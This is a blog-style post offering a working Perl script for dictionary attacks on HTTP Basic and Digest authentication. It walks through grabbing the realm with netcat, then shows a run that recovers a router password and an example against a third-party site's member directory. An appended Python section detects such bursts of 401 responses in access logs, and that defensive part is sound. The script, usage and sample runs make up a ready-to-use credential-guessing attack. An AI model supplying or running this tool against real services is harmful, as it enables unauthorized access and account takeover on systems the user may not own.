For when you forget your router's password

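medusa doesn't support digest, can't take a directory, and has various other issues, so
I wrote a simple script that runs a dictionary attack against basic and digest authentication.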
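#!/usr/bin/perl
# Dictionary check of HTTP Basic/Digest credentials via LWP.
use strict;
use warnings;
use LWP::UserAgent;

my ($host, $realm, $user, $dic, $uri) = @ARGV;
if (@ARGV < 4) {
    print "Usage: ./bfhttp <host:port> <realm> <user> <dic> [path]\n";
    print "Example: ./bfhttp 192.168.1.1:80 PR-S300SE user pass.dic\n";
    exit;
}
$uri = '' unless defined $uri;    # optional path; defaults to the document root

open(my $fh, '<', $dic) or die "$dic: $!";
while (my $line = <$fh>) {
    chomp($line);
    print "Trying... \"$line\"\n";
    my $ua = LWP::UserAgent->new;
    # LWP answers the 401 challenge (Basic or Digest) with these credentials
    $ua->credentials($host, $realm, $user, $line);
    my $res = $ua->get("http://$host/$uri");
    if ($res->is_success) {
        print "\nPassword is \"$line\"\n\n";
        exit;
    }
}
close($fh);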

Get the realm
$ nc 10.25.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 401 Unauthorized
Server: GoAhead-Webs
Date: Sun Oct 30 12:00:55 2011
WWW-Authenticate: Basic realm="Default: admin/password"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

Run it with the realm specified
$ ./bfhttp 10.25.0.1:80 "Default: admin/password" admin pass.dic
Trying... "0000"
Trying... "1111"
Trying... "1223334444"
Trying... "122333444455555"
Trying... "1234"
Trying... "12345678"
Trying... "123xxxyyy"
Trying... "DEFAULT"
Trying... "Default"
Trying... "LOGIN"
Trying... "Password"
Trying... "ROOT"
Trying... "SERVER"
Trying... "TEST"
Trying... "User"
Trying... "adam"
Trying... "admin"
Trying... "administrator"
Trying... "backup"
Trying... "config"
Trying... "cracker"
Trying... "default"
Trying... "falcon"
Trying... "ftp"
Trying... "ftpuser"
Trying... "hacker"
Trying... "http"
Trying... "john"
Trying... "linux"
Trying... "login"
Trying... "master"
Trying... "netman"
Trying... "owner"
Trying... "p@$$w0rd"
Trying... "pass"
Trying... "password"

Password is "password"
Like this.


To specify a directory,
get the realm with a HEAD request against the directory that has authentication on it,
$ nc www.hogehoge.jp 80
HEAD 2011_hoge/member/ HTTP/1.0

HTTP/1.1 401 Authorization Required
Date: Sun, 30 Oct 2011 03:04:45 GMT
Server: Apache/2.2.17
WWW-Authenticate: Basic realm="Check Members"
Connection: close
Content-Type: text/html; charset=iso-8859-1

then run it with the realm you got, giving the directory as the last option
$ ./bfhttp www.hogehoge.jp:80 "Check Members" user pass.dic 2011_hoge/member/
and that's about it.
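
Seen from the server side, a run like the ones above appears in the access log as a burst of 401 responses for one path from one client, possibly ending in a 2xx. The following Python is an added example, not part of the original post: it flags that pattern in combined-format access-log lines. The sample lines, the threshold, the window and the function names are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log line: client, timestamp, request path, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def find_auth_guessing(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {(ip, path): {"failures": n, "success_after": bool}} for every
    client that produced >= threshold 401s on one path within `window`."""
    recent = defaultdict(deque)   # (ip, path) -> timestamps of recent 401s
    total = defaultdict(int)      # (ip, path) -> all 401s seen so far
    flagged = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # skip lines that are not in combined format
        key = (m["ip"], m["path"])
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["status"] == "401":
            total[key] += 1
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold:
                flagged.setdefault(key, {"failures": 0, "success_after": False})
            if key in flagged:
                flagged[key]["failures"] = total[key]
        elif m["status"].startswith("2") and key in flagged:
            # a 2xx after a burst of 401s: one of the guesses may have worked
            flagged[key]["success_after"] = True
    return flagged

def sample_log():
    """Constructed sample: one client failing 12 times and then succeeding,
    and one user who mistypes a password once."""
    fmt = '{ip} - {user} [30/Oct/2011:12:00:{s:02d} +0900] "GET /member/ HTTP/1.1" {st} 512'
    lines = [fmt.format(ip="192.0.2.10", user="admin", s=i, st=401) for i in range(12)]
    lines.append(fmt.format(ip="192.0.2.10", user="admin", s=12, st=200))
    lines.append(fmt.format(ip="198.51.100.7", user="user", s=20, st=401))
    lines.append(fmt.format(ip="198.51.100.7", user="user", s=25, st=200))
    return lines

if __name__ == "__main__":
    for (ip, path), info in find_auth_guessing(sample_log()).items():
        print(ip, path, info)
```

A flagged entry with success_after set is the case to act on first: change that account's password and add lockout or rate limiting in front of the protected path.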